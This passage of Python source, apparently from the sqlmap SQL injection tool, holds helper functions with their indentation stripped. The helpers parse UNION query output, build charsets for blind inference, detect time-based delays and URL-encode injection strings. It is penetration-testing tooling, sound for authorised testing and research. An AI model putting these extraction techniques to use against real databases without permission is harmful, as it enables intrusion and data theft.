if asterisk:
infoMsg = "you did not provide the fields in your query. "
infoMsg += "sqlmap will retrieve the column names itself"
logger.info(infoMsg)
_ = asterisk.group(2).replace("..", ".").replace(".dbo.", ".")
db, conf.tbl = _.split(".", 1) if '.' in _ else (None, _)
if db is None:
if expression != conf.query:
conf.db = db
else:
expression = re.sub(r"([^\w])%s" % re.escape(conf.tbl), "\g<1>%s.%s" % (conf.db, conf.tbl), expression)
else:
conf.db = db
conf.db = safeSQLIdentificatorNaming(conf.db)
conf.tbl = safeSQLIdentificatorNaming(conf.tbl, True)
columnsDict = conf.dbmsHandler.getColumns(onlyColNames=True)
if columnsDict and conf.db in columnsDict and conf.tbl in columnsDict[conf.db]:
columns = columnsDict[conf.db][conf.tbl].keys()
columns.sort()
columnsStr = ", ".join(column for column in columns)
expression = expression.replace("*", columnsStr, 1)
infoMsg = "the query with expanded column name(s) is: "
infoMsg += "%s" % expression
logger.info(infoMsg)
return expression
def getLimitRange(count, dump=False, plusOne=False):
"""
Returns range of values used in limit/offset constructs
>>> [_ for _ in getLimitRange(10)]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
retVal = None
count = int(count)
limitStart, limitStop = 1, count
if dump:
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart
retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop)
return retVal
def parseUnionPage(page):
"""
Returns resulting items from UNION query inside provided page content
"""
if page is None:
return None
if re.search("(?si)\A%s.*%s\Z" % (kb.chars.start, kb.chars.stop), page):
if len(page) > LARGE_OUTPUT_THRESHOLD:
warnMsg = "large output detected. This might take a while"
logger.warn(warnMsg)
data = BigArray()
keys = set()
for match in re.finditer("%s(.*?)%s" % (kb.chars.start, kb.chars.stop), page, re.DOTALL | re.IGNORECASE):
entry = match.group(1)
if kb.chars.start in entry:
entry = entry.split(kb.chars.start)[-1]
if kb.unionDuplicates:
key = entry.lower()
if key not in keys:
keys.add(key)
else:
continue
entry = entry.split(kb.chars.delimiter)
if conf.hexConvert:
entry = applyFunctionRecursively(entry, decodeHexValue)
if kb.safeCharEncode:
entry = applyFunctionRecursively(entry, safecharencode)
data.append(entry[0] if len(entry) == 1 else entry)
else:
data = page
if len(data) == 1 and isinstance(data[0], basestring):
data = data[0]
return data
def parseFilePaths(page):
"""
Detects (possible) absolute system paths inside the provided page content
"""
if page:
for regex in (r" in <b>(?P<result>.*?)</b> on line", r"(?:>|\s)(?P<result>[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P<result>/\w[/\w.]+)"):
for match in re.finditer(regex, page):
absFilePath = match.group("result").strip()
page = page.replace(absFilePath, "")
if isWindowsDriveLetterPath(absFilePath):
absFilePath = posixToNtSlashes(absFilePath)
if absFilePath not in kb.absFilePaths:
kb.absFilePaths.add(absFilePath)
def getLocalIP():
"""
Get local IP address (exposed to the remote/target)
"""
retVal = None
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((conf.hostname, conf.port))
retVal, _ = s.getsockname()
s.close()
except:
debugMsg = "there was an error in opening socket "
debugMsg += "connection toward '%s'" % conf.hostname
logger.debug(debugMsg)
return retVal
def getRemoteIP():
"""
Get remote/target IP address
"""
retVal = None
try:
retVal = socket.gethostbyname(conf.hostname)
except socket.gaierror:
errMsg = "address resolution problem "
errMsg += "occurred for hostname '%s'" % conf.hostname
singleTimeLogMessage(errMsg, logging.ERROR)
return retVal
def getFileType(filePath):
try:
_ = magic.from_file(filePath)
except:
return "unknown"
return "text" if "ASCII" in _ or "text" in _ else "binary"
def getCharset(charsetType=None):
"""
Returns list with integers representing characters of a given
charset type appropriate for inference techniques
>>> getCharset(CHARSET_TYPE.BINARY)
[0, 1, 47, 48, 49]
"""
asciiTbl = []
if charsetType is None:
asciiTbl.extend(xrange(0, 128))
# 0 or 1
elif charsetType == CHARSET_TYPE.BINARY:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 50))
# Digits
elif charsetType == CHARSET_TYPE.DIGITS:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 58))
# Hexadecimal
elif charsetType == CHARSET_TYPE.HEXADECIMAL:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 58))
asciiTbl.extend(xrange(64, 71))
asciiTbl.extend([87, 88]) # X
asciiTbl.extend(xrange(96, 103))
asciiTbl.extend([119, 120]) # x
# Characters
elif charsetType == CHARSET_TYPE.ALPHA:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(64, 91))
asciiTbl.extend(xrange(96, 123))
# Characters and digits
elif charsetType == CHARSET_TYPE.ALPHANUM:
asciiTbl.extend([0, 1])
asciiTbl.extend(xrange(47, 58))
asciiTbl.extend(xrange(64, 91))
asciiTbl.extend(xrange(96, 123))
return asciiTbl
def directoryPath(filepath):
"""
Returns directory path for a given filepath
>>> directoryPath('/var/log/apache.log')
'/var/log'
"""
retVal = filepath
if filepath:
retVal = ntpath.dirname(filepath) if isWindowsDriveLetterPath(filepath) else posixpath.dirname(filepath)
return retVal
def normalizePath(filepath):
"""
Returns normalized string representation of a given filepath
>>> normalizePath('//var///log/apache.log')
'//var/log/apache.log'
"""
retVal = filepath
if retVal:
retVal = retVal.strip("\r\n")
retVal = ntpath.normpath(retVal) if isWindowsDriveLetterPath(retVal) else posixpath.normpath(retVal)
return retVal
def safeStringFormat(format_, params):
"""
Avoids problems with inappropriate string format strings
>>> safeStringFormat('foobar%d%s', ('1', 2))
u'foobar12'
"""
if format_.count(PAYLOAD_DELIMITER) == 2:
_ = format_.split(PAYLOAD_DELIMITER)
_[1] = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", _[1])
retVal = PAYLOAD_DELIMITER.join(_)
else:
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%d)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>", format_)
if isinstance(params, basestring):
retVal = retVal.replace("%s", params, 1)
elif not isListLike(params):
retVal = retVal.replace("%s", str(params), 1)
else:
count, index = 0, 0
if retVal.count("%s") == len(params):
while index != -1:
index = retVal.find("%s")
if index != -1:
retVal = retVal[:index] + getUnicode(params[count]) + retVal[index + 2:]
count += 1
else:
count = 0
while True:
match = re.search(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", retVal)
if match:
if count >= len(params):
raise Exception("wrong number of parameters during string formatting")
else:
retVal = re.sub(r"(\A|[^A-Za-z0-9])(%s)([^A-Za-z0-9]|\Z)", r"\g<1>%s\g<3>" % params[count], retVal, 1)
count += 1
else:
break
return retVal
def getFilteredPageContent(page, onlyText=True):
"""
Returns filtered page content without script, style and/or comments
or all HTML tags
>>> getFilteredPageContent(u'<html><title>foobar</title><body>test</body></html>')
u'foobar test'
"""
retVal = page
# only if the page's charset has been successfully identified
if isinstance(page, unicode):
retVal = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>%s" % (r"|<[^>]+>|\t|\n|\r" if onlyText else ""), " ", page)
while retVal.find(" ") != -1:
retVal = retVal.replace(" ", " ")
retVal = htmlunescape(retVal.strip())
return retVal
def getPageWordSet(page):
"""
Returns word set used in page content
>>> sorted(getPageWordSet(u'<html><title>foobar</title><body>test</body></html>'))
[u'foobar', u'test']
"""
retVal = set()
# only if the page's charset has been successfully identified
if isinstance(page, unicode):
_ = getFilteredPageContent(page)
retVal = set(re.findall(r"\w+", _))
return retVal
def showStaticWords(firstPage, secondPage):
"""
Prints words appearing in two different response pages
"""
infoMsg = "finding static words in longest matching part of dynamic page content"
logger.info(infoMsg)
firstPage = getFilteredPageContent(firstPage)
secondPage = getFilteredPageContent(secondPage)
infoMsg = "static words: "
if firstPage and secondPage:
match = SequenceMatcher(None, firstPage, secondPage).find_longest_match(0, len(firstPage), 0, len(secondPage))
commonText = firstPage[match[0]:match[0] + match[2]]
commonWords = getPageWordSet(commonText)
else:
commonWords = None
if commonWords:
commonWords = list(commonWords)
commonWords.sort(lambda a, b: cmp(a.lower(), b.lower()))
for word in commonWords:
if len(word) > 2:
infoMsg += "'%s', " % word
infoMsg = infoMsg.rstrip(", ")
else:
infoMsg += "None"
logger.info(infoMsg)
def isWindowsDriveLetterPath(filepath):
"""
Returns True if given filepath starts with a Windows drive letter
>>> isWindowsDriveLetterPath('C:\\boot.ini')
True
>>> isWindowsDriveLetterPath('/var/log/apache.log')
False
"""
return re.search("\A[\w]\:", filepath) is not None
def posixToNtSlashes(filepath):
"""
Replaces all occurrences of Posix slashes (/) in provided
filepath with NT ones (\)
>>> posixToNtSlashes('C:/Windows')
'C:\\\\Windows'
"""
return filepath.replace('/', '\\')
def ntToPosixSlashes(filepath):
"""
Replaces all occurrences of NT slashes (\) in provided
filepath with Posix ones (/)
>>> ntToPosixSlashes('C:\\Windows')
'C:/Windows'
"""
return filepath.replace('\\', '/')
def isHexEncodedString(subject):
"""
Checks if the provided string is hex encoded
>>> isHexEncodedString('DEADBEEF')
True
>>> isHexEncodedString('test')
False
"""
return re.match(r"\A[0-9a-fA-Fx]+\Z", subject) is not None
@cachedmethod
def getConsoleWidth(default=80):
"""
Returns console width
"""
width = None
if os.getenv("COLUMNS", "").isdigit():
width = int(os.getenv("COLUMNS"))
else:
try:
with open(os.devnull, 'w') as FNULL:
process = execute("stty size", shell=True, stdout=PIPE, stderr=FNULL)
stdout, _ = process.communicate()
items = stdout.split()
if len(items) == 2 and items[1].isdigit():
width = int(items[1])
except OSError:
pass
if width is None:
try:
import curses
stdscr = curses.initscr()
_, width = stdscr.getmaxyx()
curses.endwin()
except:
pass
return width or default
def clearConsoleLine(forceOutput=False):
"""
Clears current console line
"""
if getattr(LOGGER_HANDLER, "is_tty", False):
dataToStdout("\r%s\r" % (" " * (getConsoleWidth() - 1)), forceOutput)
kb.prependFlag = False
kb.stickyLevel = None
def parseXmlFile(xmlFile, handler):
"""
Parses XML file by a given handler
"""
with contextlib.closing(StringIO(readCachedFileContent(xmlFile))) as stream:
parse(stream, handler)
def getSQLSnippet(dbms, sfile, **variables):
"""
Returns content of SQL snippet located inside 'procs/' directory
"""
if sfile.endswith('.sql') and os.path.exists(sfile):
filename = sfile
elif not sfile.endswith('.sql') and os.path.exists("%s.sql" % sfile):
filename = "%s.sql" % sfile
else:
filename = os.path.join(paths.SQLMAP_PROCS_PATH, DBMS_DIRECTORY_DICT[dbms], sfile if sfile.endswith('.sql') else "%s.sql" % sfile)
checkFile(filename)
retVal = readCachedFileContent(filename)
retVal = re.sub(r"#.+", "", retVal)
retVal = re.sub(r"(?s);\s+", "; ", retVal).strip("\r\n")
for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
retVal = retVal.replace(_, randomStr())
for _ in re.findall(r"%RANDINT\d+%", retVal, re.I):
retVal = retVal.replace(_, str(randomInt()))  # randomInt() returns an int; str.replace() needs a string
variables = re.findall(r"(?<!\bLIKE ')%(\w+)%", retVal, re.I)
if variables:
errMsg = "unresolved variable%s '%s' in SQL file '%s'" % ("s" if len(variables) > 1 else "", ", ".join(variables), sfile)
logger.error(errMsg)
msg = "do you want to provide the substitution values? [y/N] "
choice = readInput(msg, default="N")
if choice and choice[0].lower() == "y":
for var in variables:
msg = "insert value for variable '%s': " % var
val = readInput(msg)
retVal = retVal.replace(r"%%%s%%" % var, val)
return retVal
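# Editor's illustrative sketch (file and variable names below are hypothetical): a snippet
# such as procs/mysql/example.sql may contain placeholders like %RANDSTR1%, %RANDINT1% or
# custom ones like %OUTPREFIX%; the custom ones are filled from keyword arguments, e.g.
#   getSQLSnippet(DBMS.MYSQL, "example", OUTPREFIX="sqlmapoutput")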
def readCachedFileContent(filename, mode='rb'):
"""
Cached reading of file content (avoids reading the same file multiple times)
"""
if filename not in kb.cache.content:
with kb.locks.cache:
if filename not in kb.cache.content:
checkFile(filename)
with codecs.open(filename, mode, UNICODE_ENCODING) as f:
kb.cache.content[filename] = f.read()
return kb.cache.content[filename]
def readXmlFile(xmlFile):
"""
Reads XML file content and returns its DOM representation
"""
checkFile(xmlFile)
retVal = minidom.parse(xmlFile).documentElement
return retVal
def stdev(values):
"""
Computes standard deviation of a list of numbers.
Reference: http://www.goldb.org/corestats.html
>>> stdev([0.9, 0.9, 0.9, 1.0, 0.8, 0.9])
0.06324555320336757
"""
if not values or len(values) < 2:
return None
key = (values[0], values[-1], len(values))
if kb.get("cache") and key in kb.cache.stdev:
retVal = kb.cache.stdev[key]
else:
avg = average(values)
_ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0)
retVal = sqrt(_ / (len(values) - 1))
if kb.get("cache"):
kb.cache.stdev[key] = retVal
return retVal
def average(values):
"""
Computes the arithmetic mean of a list of numbers.
>>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9])
0.9
"""
return (sum(values) / len(values)) if values else None
def calculateDeltaSeconds(start):
"""
Returns elapsed time from start till now
"""
return time.time() - start
def initCommonOutputs():
"""
Initializes dictionary containing common output values used by "good samaritan" feature
"""
kb.commonOutputs = {}
key = None
with codecs.open(paths.COMMON_OUTPUTS, 'r', UNICODE_ENCODING) as f:
for line in f.readlines(): # xreadlines doesn't return unicode strings when codecs.open() is used
if line.find('#') != -1:
line = line[:line.find('#')]
line = line.strip()
if len(line) > 1:
if line.startswith('[') and line.endswith(']'):
key = line[1:-1]
elif key:
if key not in kb.commonOutputs:
kb.commonOutputs[key] = set()
if line not in kb.commonOutputs[key]:
kb.commonOutputs[key].add(line)
def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, unique=False):
"""
Returns newline delimited items contained inside file
"""
retVal = list() if not unique else OrderedDict()
checkFile(filename)
with codecs.open(filename, 'r', UNICODE_ENCODING, errors="ignore") if unicode_ else open(filename, 'r') as f:
for line in (f.readlines() if unicode_ else f.xreadlines()): # xreadlines doesn't return unicode strings when codecs.open() is used
if commentPrefix:
if line.find(commentPrefix) != -1:
line = line[:line.find(commentPrefix)]
line = line.strip()
if not unicode_:
try:
line = str.encode(line)
except UnicodeDecodeError:
continue
if line:
if lowercase:
line = line.lower()
if unique and line in retVal:
continue
if unique:
retVal[line] = True
else:
retVal.append(line)
return retVal if not unique else retVal.keys()
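# Editor's illustrative note (assumed example): comments ('#'...) and blank lines are
# stripped and order is preserved; with unique=True duplicates are dropped via the
# OrderedDict keys, so a file containing "admin\n# comment\nadmin\nroot\n" is expected
# to yield [u'admin', u'root'].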
def goGoodSamaritan(prevValue, originalCharset):
"""
Function for retrieving parameters needed for common prediction (good
samaritan) feature.
prevValue: retrieved query output so far (e.g. 'i').
Returns commonValue if there is a single complete match (under the kb.partRun
section of txt/common-outputs.txt) for prevValue. If there are multiple partial
matches instead of a single one, commonCharset is returned containing the more
probable characters (taken from the matched values in txt/common-outputs.txt)
together with the rest of the charset as otherCharset.
"""
if kb.commonOutputs is None:
initCommonOutputs()
predictionSet = set()
commonValue = None
commonPattern = None
countCommonValue = 0
# If the header (e.g. Databases) we are looking for has common
# outputs defined
if kb.partRun in kb.commonOutputs:
commonPartOutputs = kb.commonOutputs[kb.partRun]
commonPattern = commonFinderOnly(prevValue, commonPartOutputs)
# If the longest common prefix is the same as previous value then
# do not consider it
if commonPattern and commonPattern == prevValue:
commonPattern = None
# For each common output
for item in commonPartOutputs:
# Check if the common output (item) starts with prevValue
# where prevValue is the enumerated character(s) so far
if item.startswith(prevValue):
commonValue = item
countCommonValue += 1
if len(item) > len(prevValue):
char = item[len(prevValue)]
predictionSet.add(char)
# Reset single value if there is more than one possible common
# output
if countCommonValue > 1:
commonValue = None
commonCharset = []
otherCharset = []
# Split the original charset into common chars (commonCharset)
# and other chars (otherCharset)
for ordChar in originalCharset:
if chr(ordChar) not in predictionSet:
otherCharset.append(ordChar)
else:
commonCharset.append(ordChar)
commonCharset.sort()
return commonValue, commonPattern, commonCharset, otherCharset
else:
return None, None, None, originalCharset
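# Editor's illustrative note (all values below are assumed): with prevValue 'm' and common
# outputs ['mode', 'model', 'modes'], several items match, so commonValue stays None,
# commonPattern becomes their shared prefix 'mode', and commonCharset promotes ord('o')
# (the next character in every match) while the remaining charset is returned as otherCharset.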
def getPartRun(alias=True):
"""
Goes through call stack and finds constructs matching conf.dbmsHandler.*.
Returns it or its alias used in txt/common-outputs.txt
"""
retVal = None
commonPartsDict = optDict["Enumeration"]
try:
stack = [item[4][0] if isinstance(item[4], list) else '' for item in inspect.stack()]
# Goes backwards through the stack to find the conf.dbmsHandler method
# calling this function
for i in xrange(0, len(stack) - 1):
for regex in (r"self\.(get[^(]+)\(\)", r"conf\.dbmsHandler\.([^(]+)\(\)"):
match = re.search(regex, stack[i])
if match:
# This is the calling conf.dbmsHandler or self method
# (e.g. 'getDbms')
retVal = match.groups()[0]
break
if retVal is not None:
break
# Reference: http://coding.derkeiler.com/Archive/Python/comp.lang.python/2004-06/2267.html
except TypeError:
pass
# Return the INI tag to consider for common outputs (e.g. 'Databases')
if alias:
return commonPartsDict[retVal][1] if isinstance(commonPartsDict.get(retVal), tuple) else retVal
else:
return retVal
def getUnicode(value, encoding=None, noneToNull=False):
"""
Return the unicode representation of the supplied value:
>>> getUnicode(u'test')
u'test'
>>> getUnicode('test')
u'test'
>>> getUnicode(1)
u'1'
"""
if noneToNull and value is None:
return NULL
if isListLike(value):
value = list(getUnicode(_, encoding, noneToNull) for _ in value)
return value
if isinstance(value, unicode):
return value
elif isinstance(value, basestring):
while True:
try:
return unicode(value, encoding or kb.get("pageEncoding") or UNICODE_ENCODING)
except UnicodeDecodeError, ex:
value = value[:ex.start] + "".join(INVALID_UNICODE_CHAR_FORMAT % ord(_) for _ in value[ex.start:ex.end]) + value[ex.end:]
else:
try:
return unicode(value)
except UnicodeDecodeError:
return unicode(str(value), errors="ignore") # encoding ignored for non-basestring instances
def longestCommonPrefix(*sequences):
"""
Returns longest common prefix occurring in given sequences
Reference: http://boredzo.org/blog/archives/2007-01-06/longest-common-prefix-in-python-2
>>> longestCommonPrefix('foobar', 'fobar')
'fo'
"""
if len(sequences) == 1:
return sequences[0]
sequences = [pair[1] for pair in sorted((len(fi), fi) for fi in sequences)]
if not sequences:
return None
for i, comparison_ch in enumerate(sequences[0]):
for fi in sequences[1:]:
ch = fi[i]
if ch != comparison_ch:
return fi[:i]
return sequences[0]
def commonFinderOnly(initial, sequence):
return longestCommonPrefix(*filter(lambda x: x.startswith(initial), sequence))
def pushValue(value):
"""
Push value to the stack (thread dependent)
"""
getCurrentThreadData().valueStack.append(copy.deepcopy(value))
def popValue():
"""
Pop value from the stack (thread dependent)
>>> pushValue('foobar')
>>> popValue()
'foobar'
"""
return getCurrentThreadData().valueStack.pop()
def wasLastResponseDBMSError():
"""
Returns True if the last web request resulted in a (recognized) DBMS error page
"""
threadData = getCurrentThreadData()
return threadData.lastErrorPage and threadData.lastErrorPage[0] == threadData.lastRequestUID
def wasLastResponseHTTPError():
"""
Returns True if the last web request resulted in an erroneous HTTP code (like 500)
"""
threadData = getCurrentThreadData()
return threadData.lastHTTPError and threadData.lastHTTPError[0] == threadData.lastRequestUID
def wasLastResponseDelayed():
"""
Returns True if the last web request resulted in a time-delay
"""
# 99.9999999997440% of all non time-based SQL injection affected
# response times should be inside +-7*stdev([normal response times])
# Math reference: http://www.answers.com/topic/standard-deviation
deviation = stdev(kb.responseTimes)
threadData = getCurrentThreadData()
if deviation and not conf.direct:
if len(kb.responseTimes) < MIN_TIME_RESPONSES:
warnMsg = "time-based standard deviation method used on a model "
warnMsg += "with less than %d response times" % MIN_TIME_RESPONSES
logger.warn(warnMsg)
lowerStdLimit = average(kb.responseTimes) + TIME_STDEV_COEFF * deviation
retVal = (threadData.lastQueryDuration >= max(MIN_VALID_DELAYED_RESPONSE, lowerStdLimit))
if not kb.testMode and retVal:
if kb.adjustTimeDelay is None:
msg = "do you want sqlmap to try to optimize value(s) "
msg += "for DBMS delay responses (option '--time-sec')? [Y/n] "
choice = readInput(msg, default='Y')
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE if choice.upper() == 'N' else ADJUST_TIME_DELAY.YES
if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES:
adjustTimeDelay(threadData.lastQueryDuration, lowerStdLimit)
return retVal
else:
return (threadData.lastQueryDuration - conf.timeSec) >= 0
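# Editor's illustrative note: the decision boundary used above is roughly
#   threshold = max(MIN_VALID_DELAYED_RESPONSE, average(times) + TIME_STDEV_COEFF * stdev(times))
# so with (assumed numbers) a mean of 0.5s, a stdev of 0.05s and TIME_STDEV_COEFF of 7,
# the last request counts as delayed once it lasted about 0.85s or more.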
def adjustTimeDelay(lastQueryDuration, lowerStdLimit):
"""
Provides tip for adjusting time delay in time-based data retrieval
"""
candidate = 1 + int(round(lowerStdLimit))
if candidate:
kb.delayCandidates = [candidate] + kb.delayCandidates[:-1]
if all((x == candidate for x in kb.delayCandidates)) and candidate < conf.timeSec:
conf.timeSec = candidate
infoMsg = "adjusting time delay to "
infoMsg += "%d second%s due to good response times" % (conf.timeSec, 's' if conf.timeSec > 1 else '')
logger.info(infoMsg)
def getLastRequestHTTPError():
"""
Returns last HTTP error code
"""
threadData = getCurrentThreadData()
return threadData.lastHTTPError[1] if threadData.lastHTTPError else None
def extractErrorMessage(page):
"""
Returns reported error message from page if it finds one
>>> extractErrorMessage(u'<html><title>Test</title>\\n<b>Warning</b>: oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated<br><p>Only a test page</p></html>')
u'oci_parse() [function.oci-parse]: ORA-01756: quoted string not properly terminated'
"""
retVal = None
if isinstance(page, basestring):
for regex in ERROR_PARSING_REGEXES:
match = re.search(regex, page, re.DOTALL | re.IGNORECASE)
if match:
retVal = htmlunescape(match.group("result")).replace("<br>", "\n").strip()
break
return retVal
def findMultipartPostBoundary(post):
"""
Finds value for a boundary parameter in given multipart POST body
"""
retVal = None
done = set()
candidates = []
for match in re.finditer(r"(?m)^--(.+?)(--)?$", post or ""):
_ = match.group(1)
if _ in done:
continue
else:
candidates.append((post.count(_), _))
done.add(_)
if candidates:
candidates.sort(key=lambda _: _[0], reverse=True)
retVal = candidates[0][1]
return retVal
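# Editor's illustrative note (made-up body): for a multipart POST whose parts are delimited
# by lines starting with '--xyz' and terminated by '--xyz--', the candidate 'xyz' occurs
# most often and findMultipartPostBoundary() is expected to return 'xyz'.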
def urldecode(value, encoding=None, unsafe="%%&=;+%s" % CUSTOM_INJECTION_MARK_CHAR, convall=False, plusspace=True):
"""
URL decodes given value
>>> urldecode('AND%201%3E%282%2B3%29%23', convall=True)
u'AND 1>(2+3)#'
"""
result = value
if value:
try:
# for cases like T%C3%BCrk%C3%A7e
value = str(value)
except ValueError:
pass
finally:
if convall:
result = urllib.unquote_plus(value) if plusspace else urllib.unquote(value)
else:
def _(match):
charset = reduce(lambda x, y: x.replace(y, ""), unsafe, string.printable)
char = chr(ord(match.group(1).decode("hex")))
return char if char in charset else match.group(0)
result = value
if plusspace:
result = result.replace("+", " ") # plus sign has a special meaning in URL encoded data (hence the usage of urllib.unquote_plus in convall case)
result = re.sub("%([0-9a-fA-F]{2})", _, result)
if isinstance(result, str):
result = unicode(result, encoding or UNICODE_ENCODING, "replace")
return result
def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
"""
URL encodes given value
>>> urlencode('AND 1>(2+3)#')
'AND%201%3E%282%2B3%29%23'
"""
if conf.get("direct"):
return value
count = 0
result = None if value is None else ""
if value:
if Backend.isDbms(DBMS.MSSQL) and not kb.tamperFunctions and any(ord(_) > 255 for _ in value):
warnMsg = "if you experience problems with "
warnMsg += "non-ASCII identifier names "
warnMsg += "you are advised to rerun with '--tamper=charunicodeencode'"
singleTimeWarnMessage(warnMsg)
if convall or safe is None:
safe = ""
# corner case when character % really needs to be
# encoded (when not representing URL encoded char)
# except in cases when tampering scripts are used
if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions:
value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value)
while True:
result = urllib.quote(utf8encode(value), safe)
if limit and len(result) > URLENCODE_CHAR_LIMIT:
if count >= len(URLENCODE_FAILSAFE_CHARS):
break
while count < len(URLENCODE_FAILSAFE_CHARS):
safe += URLENCODE_FAILSAFE_CHARS[count]
count += 1
if safe[-1] in value:
break
else:
break
if spaceplus:
result = result.replace(urllib.quote(' '), '+')
return result
def runningAsAdmin():
"""
Returns True if the current process is run under admin privileges
"""
isAdmin = None
if PLATFORM in ("posix", "mac"):
_ = os.geteuid()
isAdmin = isinstance(_, (int, float, long)) and _ == 0
elif IS_WIN:
import ctypes
_ = ctypes.windll.shell32.IsUserAnAdmin()
isAdmin = isinstance(_, (int, float, long)) and _ == 1
else:
errMsg = "sqlmap is not able to check if you are running it "
errMsg += "as an administrator account on this platform. "
errMsg += "sqlmap will assume that you are an administrator "
errMsg += "which is mandatory for the requested takeover attack "
errMsg += "to work properly"
logger.error(errMsg)
isAdmin = True
return isAdmin
def logHTTPTraffic(requestLogMsg, responseLogMsg):
"""
Logs HTTP traffic to the output file
"""
if not conf.trafficFile:
return
with kb.locks.log:
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))
def getPageTemplate(payload, place): # Cross-linked function
raise NotImplementedError
def getPublicTypeMembers(type_, onlyValues=False):
"""
Useful for getting members from types (e.g. in enums)
>>> [_ for _ in getPublicTypeMembers(OS, True)]
['Linux', 'Windows']
"""
for name, value in inspect.getmembers(type_):
if not name.startswith('__'):
if not onlyValues:
yield (name, value)
else:
yield value
def enumValueToNameLookup(type_, value_):
"""
Returns the name of an enum member with a given value
>>> enumValueToNameLookup(SORT_ORDER, 100)
'LAST'
"""
retVal = None
for name, value in getPublicTypeMembers(type_):
if value == value_:
retVal = name
break
return retVal
def extractRegexResult(regex, content, flags=0):
"""
Returns 'result' group value from a possible match with regex on a given
content
>>> extractRegexResult(r'a(?P<result>[^g]+)g', 'abcdefg')
'bcdef'
"""
retVal = None
if regex and content and "?P<result>" in regex:
match = re.search(regex, content, flags)
if match:
retVal = match.group("result")
return retVal
def extractTextTagContent(page):
"""
Returns list containing content from "textual" tags
>>> extractTextTagContent(u'<html><head><title>Title</title></head><body><pre>foobar</pre><a href="#link">Link</a></body></html>')
[u'Title', u'foobar']
"""
page = re.sub(r"(?si)[^\s>]*%s[^<]*" % REFLECTED_VALUE_MARKER, "", page or "")
return filter(None, (_.group('result').strip() for _ in re.finditer(TEXT_TAG_REGEX, page)))
def trimAlphaNum(value):
"""
Trims alpha numeric characters from start and ending of a given value
>>> trimAlphaNum(u'AND 1>(2+3)-- foobar')
u' 1>(2+3)-- '
"""
while value and value[-1].isalnum():
value = value[:-1]
while value and value[0].isalnum():
value = value[1:]
return value
def isNumPosStrValue(value):
"""
Returns True if value is a string (or integer) with a positive integer representation
>>> isNumPosStrValue(1)
True
>>> isNumPosStrValue('1')
True
>>> isNumPosStrValue(0)
False
>>> isNumPosStrValue('-2')
False
"""
return (value and isinstance(value, basestring) and value.isdigit() and int(value) > 0) or (isinstance(value, int) and value > 0)
@cachedmethod
def aliasToDbmsEnum(dbms):
"""
Returns major DBMS name from a given alias
>>> aliasToDbmsEnum('mssql')
'Microsoft SQL Server'
"""
retVal = None
if dbms:
for key, item in DBMS_DICT.items():
if dbms.lower() in item[0] or dbms.lower() == key.lower():
retVal = key
break
return retVal
def findDynamicContent(firstPage, secondPage):
"""
This function checks if the provided pages have dynamic content. If they
are dynamic, proper markings will be made
"""
infoMsg = "searching for dynamic content"
logger.info(infoMsg)
blocks = SequenceMatcher(None, firstPage, secondPage).get_matching_blocks()
kb.dynamicMarkings = []
# Removing too small matching blocks
for block in blocks[:]:
(_, _, length) = block
if length <= DYNAMICITY_MARK_LENGTH:
blocks.remove(block)
# Making of dynamic markings based on prefix/suffix principle
if len(blocks) > 0:
blocks.insert(0, None)
blocks.append(None)
for i in xrange(len(blocks) - 1):
prefix = firstPage[blocks[i][0]:blocks[i][0] + blocks[i][2]] if blocks[i] else None
suffix = firstPage[blocks[i + 1][0]:blocks[i + 1][0] + blocks[i + 1][2]] if blocks[i + 1] else None
if prefix is None and blocks[i + 1][0] == 0:
continue
if suffix is None and (blocks[i][0] + blocks[i][2] >= len(firstPage)):
continue
prefix = trimAlphaNum(prefix)
suffix = trimAlphaNum(suffix)
kb.dynamicMarkings.append((re.escape(prefix[-DYNAMICITY_MARK_LENGTH / 2:]) if prefix else None, re.escape(suffix[:DYNAMICITY_MARK_LENGTH / 2]) if suffix else None))
if len(kb.dynamicMarkings) > 0:
infoMsg = "dynamic content marked for removal (%d region%s)" % (len(kb.dynamicMarkings), 's' if len(kb.dynamicMarkings) > 1 else '')
logger.info(infoMsg)
def removeDynamicContent(page):
"""
Removes dynamic content from the supplied page, basing removal on
precalculated dynamic markings
"""
if page:
for item in kb.dynamicMarkings:
prefix, suffix = item
if prefix is None and suffix is None:
continue
elif prefix is None:
page = re.sub(r'(?s)^.+%s' % re.escape(suffix), suffix, page)
elif suffix is None:
page = re.sub(r'(?s)%s.+$' % re.escape(prefix), prefix, page)
else:
page = re.sub(r'(?s)%s.+%s' % (re.escape(prefix), re.escape(suffix)), '%s%s' % (prefix, suffix), page)
return page
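# Editor's illustrative note (assumed marking): if findDynamicContent() recorded the pair
# (prefix 'Welcome, ', suffix ' | Logout'), then both 'Welcome, guest1234 | Logout' and
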